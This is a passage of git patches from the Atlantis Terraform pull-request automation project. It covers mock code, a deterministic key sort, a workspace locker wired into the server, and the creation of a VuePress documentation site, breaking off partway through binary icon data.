+	return &ParserValidator_ReadConfig_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ParserValidator_ReadConfig_OngoingVerification struct {
+	mock              *MockParserValidator
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ParserValidator_ReadConfig_OngoingVerification) GetCapturedArguments() string {
+	repoDir := c.GetAllCapturedArguments()
+	return repoDir[len(repoDir)-1]
+}
+
+func (c *ParserValidator_ReadConfig_OngoingVerification) GetAllCapturedArguments() (_param0 []string) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]string, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(string)
+		}
+	}
+	return
+}
diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go
index af17335c1b..a5b5c633eb 100644
--- a/server/events/yaml/raw/step.go
+++ b/server/events/yaml/raw/step.go
@@ -130,6 +130,8 @@ func (s Step) Validate() error {
 		for k := range elem {
 			keys = append(keys, k)
 		}
+		// Sort so tests can be deterministic.
+		sort.Strings(keys)
 
 		if len(keys) > 1 {
 			return fmt.Errorf("step element can only contain a single key, found %d: %s",
diff --git a/server/server.go b/server/server.go
index d02c1c9221..45ad488912 100644
--- a/server/server.go
+++ b/server/server.go
@@ -232,10 +232,11 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		AllowForkPRs:             userConfig.AllowForkPRs,
 		AllowForkPRsFlag:         config.AllowForkPRsFlag,
 		ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
-			ParserValidator: &yaml.ParserValidator{},
-			ProjectFinder:   &events.DefaultProjectFinder{},
-			VCSClient:       vcsClient,
-			Workspace:       workspace,
+			ParserValidator:         &yaml.ParserValidator{},
+			ProjectFinder:           &events.DefaultProjectFinder{},
+			VCSClient:               vcsClient,
+			Workspace:               workspace,
+			AtlantisWorkspaceLocker: workspaceLocker,
 		},
 		ProjectCommandRunner: &events.ProjectCommandRunner{
 			Locker:           projectLocker,

From dd12ce167ee98ef97154927008a3ec60e15a3293 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 22 Jun 2018 17:12:40 +0100
Subject: [PATCH 45/69] Create docs with VuePress

---
 .gitignore                                    |    1 +
 Makefile                                      |    6 +-
 package.json                                  |    9 +
 runatlantis.io/.vuepress/components/Home.vue  |   21 +
 runatlantis.io/.vuepress/config.js            |   41 +
 runatlantis.io/.vuepress/override.styl        |   40 +
 .../public/apple-touch-icon-114x114.png       |  Bin 0 -> 11680 bytes
 .../public/apple-touch-icon-120x120.png       |  Bin 0 -> 11094 bytes
 .../public/apple-touch-icon-144x144.png       |  Bin 0 -> 12662 bytes
 .../public/apple-touch-icon-152x152.png       |  Bin 0 -> 16807 bytes
 .../public/apple-touch-icon-57x57.png         |  Bin 0 -> 3622 bytes
 .../public/apple-touch-icon-60x60.png         |  Bin 0 -> 4016 bytes
 .../public/apple-touch-icon-72x72.png         |  Bin 0 -> 4854 bytes
 .../public/apple-touch-icon-76x76.png         |  Bin 0 -> 5739 bytes
 .../.vuepress/public/favicon-128.png          |  Bin 0 -> 6555 bytes
 .../.vuepress/public/favicon-16x16.png        |  Bin 0 -> 629 bytes
 .../.vuepress/public/favicon-196x196.png      |  Bin 0 -> 27206 bytes
 .../.vuepress/public/favicon-32x32.png        |  Bin 0 -> 1381 bytes
 .../.vuepress/public/favicon-96x96.png        |  Bin 0 -> 6105 bytes
 runatlantis.io/.vuepress/public/favicon.ico   |  Bin 0 -> 34494 bytes
 runatlantis.io/.vuepress/public/hero.png      |  Bin 0 -> 14750 bytes
 .../.vuepress/public/mstile-144x144.png       |  Bin 0 -> 12662 bytes
 .../.vuepress/public/mstile-150x150.png       |  Bin 0 -> 55616 bytes
 .../.vuepress/public/mstile-310x150.png       |  Bin 0 -> 112703 bytes
 .../.vuepress/public/mstile-310x310.png       |  Bin 0 -> 227955 bytes
 .../.vuepress/public/mstile-70x70.png         |  Bin 0 -> 6555 bytes
 runatlantis.io/README.md                      |   16 +
 runatlantis.io/docs/README.md                 |  405 ++
 runatlantis.io/docs/deployment.md             |  374 +
 runatlantis.io/docs/getting-started.md        |    0
 runatlantis.io/docs/images/atlantis-logo.png  |  Bin 0 -> 14750 bytes
 .../docs/images/atlantis-walkthrough-icon.png |  Bin 0 -> 79344 bytes
 .../docs/images/pr-comment-apply.png          |  Bin 0 -> 19474 bytes
 .../docs/images/pr-comment-help.png           |  Bin 0 -> 19736 bytes
 .../docs/images/pr-comment-plan.png           |  Bin 0 -> 19305 bytes
 runatlantis.io/docs/images/status.png         |  Bin 0 -> 45991 bytes
 runatlantis.io/docs/pull-request-commands.md  |   39 +
 yarn.lock                                     | 6179 +++++++++++++++++
 38 files changed, 7128 insertions(+), 3 deletions(-)
 create mode 100644 package.json
 create mode 100644 runatlantis.io/.vuepress/components/Home.vue
 create mode 100644 runatlantis.io/.vuepress/config.js
 create mode 100644 runatlantis.io/.vuepress/override.styl
 create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png
 create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png
 create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png
 create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png
 create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png
 create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png
 create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png
 create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png
 create mode 100644 runatlantis.io/.vuepress/public/favicon-128.png
 create mode 100644 runatlantis.io/.vuepress/public/favicon-16x16.png
 create mode 100644 runatlantis.io/.vuepress/public/favicon-196x196.png
 create mode 100644 runatlantis.io/.vuepress/public/favicon-32x32.png
 create mode 100644 runatlantis.io/.vuepress/public/favicon-96x96.png
 create mode 100644 runatlantis.io/.vuepress/public/favicon.ico
 create mode 100644 runatlantis.io/.vuepress/public/hero.png
 create mode 100644 runatlantis.io/.vuepress/public/mstile-144x144.png
 create mode 100644 runatlantis.io/.vuepress/public/mstile-150x150.png
 create mode 100644 runatlantis.io/.vuepress/public/mstile-310x150.png
 create mode 100644 runatlantis.io/.vuepress/public/mstile-310x310.png
 create mode 100644 runatlantis.io/.vuepress/public/mstile-70x70.png
 create mode 100644 runatlantis.io/README.md
 create mode 100644 runatlantis.io/docs/README.md
 create mode 100644 runatlantis.io/docs/deployment.md
 create mode 100644 runatlantis.io/docs/getting-started.md
 create mode 100644 runatlantis.io/docs/images/atlantis-logo.png
 create mode 100644 runatlantis.io/docs/images/atlantis-walkthrough-icon.png
 create mode 100644 runatlantis.io/docs/images/pr-comment-apply.png
 create mode 100644 runatlantis.io/docs/images/pr-comment-help.png
 create mode 100644 runatlantis.io/docs/images/pr-comment-plan.png
 create mode 100644 runatlantis.io/docs/images/status.png
 create mode 100644 runatlantis.io/docs/pull-request-commands.md
 create mode 100644 yarn.lock

diff --git a/.gitignore b/.gitignore
index 4da26ca0b0..b84b2a1911 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,3 +8,4 @@ website/src/public
 .DS_Store
 .cover
 .terraform/
+node_modules/
diff --git a/Makefile b/Makefile
index c2510ac725..b2d0129be6 100644
--- a/Makefile
+++ b/Makefile
@@ -82,9 +82,9 @@ end-to-end-tests: ## Run e2e tests
 	./scripts/e2e.sh
 
 generate-website-html: ## Generate HTML for website
-	cd website/src && hugo -d ../html
+	yarn website:build
 
 upload-website-html: ## Upload generated website to s3
 	aws s3 rm s3://www.runatlantis.io/ --recursive
-	aws s3 sync website/html/ s3://www.runatlantis.io/
-	rm -rf website/html/
+	aws s3 sync runatlantis.io/.vuepress/dist/ s3://www.runatlantis.io/
+	rm -rf runatlantis.io/.vuepress/dist
diff --git a/package.json b/package.json
new file mode 100644
index 0000000000..a74a965486
--- /dev/null
+++ b/package.json
@@ -0,0 +1,9 @@
+{
+  "devDependencies": {
+    "vuepress": "^0.10.2"
+  },
+  "scripts": {
+    "website:dev": "vuepress dev runatlantis.io",
+    "website:build": "vuepress build runatlantis.io"
+  }
+}
diff --git a/runatlantis.io/.vuepress/components/Home.vue b/runatlantis.io/.vuepress/components/Home.vue
new file mode 100644
index 0000000000..d118f3a8c1
--- /dev/null
+++ b/runatlantis.io/.vuepress/components/Home.vue
@@ -0,0 +1,21 @@
+<template>
+  <div class="home">
+    <div class="hero">
+      <img :src="$withBase(data.heroImage)" alt="hero">
+      <h1>{{ data.heroText || $title || 'Hello' }}</h1>
+      <p class="description">
+        {{ data.tagline || $description || 'Welcome to your VuePress site' }}
+      </p>
+      <p class="action" >
+        <NavLink class="action-button" :item="actionLink"/>
+      </p>
+    </div>
+    <div class="features">
+      <div class="feature">
+        <h2>{{ feature.title }}</h2>
+        <p>{{ feature.details }}</p>
+      </div>
+    </div>
+    <Content custom/>
+  </div>
+</template>
diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js
new file mode 100644
index 0000000000..9e2f6a54ed
--- /dev/null
+++ b/runatlantis.io/.vuepress/config.js
@@ -0,0 +1,41 @@
+module.exports = {
+    title: 'Atlantis',
+    description: 'Terraform Automation by Pull Request',
+    head: [
+        ['link', { rel: 'icon', type: 'image/png', href: 'favicon-196x196.png', sizes: '196x196' }],
+        ['link', { rel: 'icon', type: 'image/png', href: 'favicon-96x96.png', sizes: '96x96' }],
+        ['link', { rel: 'icon', type: 'image/png', href: 'favicon-32x32.png', sizes: '32x32' }],
+        ['link', { rel: 'icon', type: 'image/png', href: 'favicon-16x16.png', sizes: '16x16' }],
+        ['link', { rel: 'icon', type: 'image/png', href: 'favicon-128.png', sizes: '128x128' }],
+        ['link', { rel: 'apple-touch-icon-precomposed', sizes: '57x57', href: 'apple-touch-icon-57x57.png' }],
+        ['link', { rel: 'apple-touch-icon-precomposed', sizes: '114x114', href: 'apple-touch-icon-114x114.png' }],
+        ['link', { rel: 'apple-touch-icon-precomposed', sizes: '72x72', href: 'apple-touch-icon-72x72.png' }],
+        ['link', { rel: 'apple-touch-icon-precomposed', sizes: '144x144', href: 'apple-touch-icon-144x144.png' }],
+        ['link', { rel: 'apple-touch-icon-precomposed', sizes: '60x60', href: 'apple-touch-icon-60x60.png' }],
+        ['link', { rel: 'apple-touch-icon-precomposed', sizes: '120x120', href: 'apple-touch-icon-120x120.png' }],
+        ['link', { rel: 'apple-touch-icon-precomposed', sizes: '76x76', href: 'apple-touch-icon-76x76.png' }],
+        ['link', { rel: 'apple-touch-icon-precomposed', sizes: '152x152', href: 'apple-touch-icon-152x152.png' }],
+        ['meta', {name: 'msapplication-TileColor', content: '#FFFFFF' }],
+        ['meta', {name: 'msapplication-TileImage', content: 'mstile-144x144.png' }],
+        ['meta', {name: 'msapplication-square70x70logo', content: 'mstile-70x70.png' }],
+        ['meta', {name: 'msapplication-square150x150logo', content: 'mstile-150x150.png' }],
+        ['meta', {name: 'msapplication-wide310x150logo', content: 'mstile-310x150.png' }],
+        ['meta', {name: 'msapplication-square310x310logo', content: 'mstile-310x310.png' }],
+        ['link', { rel: 'stylesheet', sizes: '152x152', href: 'https://fonts.googleapis.com/css?family=Lato:400,900' }]
+    ],
+    themeConfig: {
+        nav: [
+            {text: 'Home', link: '/'},
+            {text: 'Docs', link: '/docs/'},
+            {text: 'Blog', link: 'https://medium.com/runatlantis'}
+        ],
+        sidebar: [
+            '/docs/',
+            '/docs/pull-request-commands',
+            '/docs/deployment',
+        ],
+        repo: 'runatlantis/atlantis',
+        docsDir: 'runatlantis.io',
+        editLinks: true,
+    }
+}
\ No newline at end of file
diff --git a/runatlantis.io/.vuepress/override.styl b/runatlantis.io/.vuepress/override.styl
new file mode 100644
index 0000000000..deb097c9dc
--- /dev/null
+++ b/runatlantis.io/.vuepress/override.styl
@@ -0,0 +1,40 @@
+$accentColor = #0074db
+$textColor = #2c3e50
+$borderColor = #eaecef
+$codeBgColor = #282c34
+
+.theme-container.home-custom {
+  .hero {
+      h1 {
+        font-size: 64px
+        font-family: Lato, sans-serif
+        font-weight: 900
+        color: #222
+      }
+      img {
+        height: 200px
+      }
+  }
+  p.description {
+    position: relative
+  }
+  p.description:before {
+    position: absolute;
+    content: '';
+    width: 40px;
+    height: 3px;
+    top: -19px;
+    left: 50%;
+    margin-left: -20px;
+    background: #ff3366;
+  }
+  .feature {
+    h2 {
+      color: #222
+    }
+    p {
+      color: #222
+    }
+  }
+}
+
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png b/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png
new file mode 100644
index 0000000000000000000000000000000000000000..e5d8f6877607a1f8b76375d04f96ff47b9ac6f12
GIT binary patch
literal 11680
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
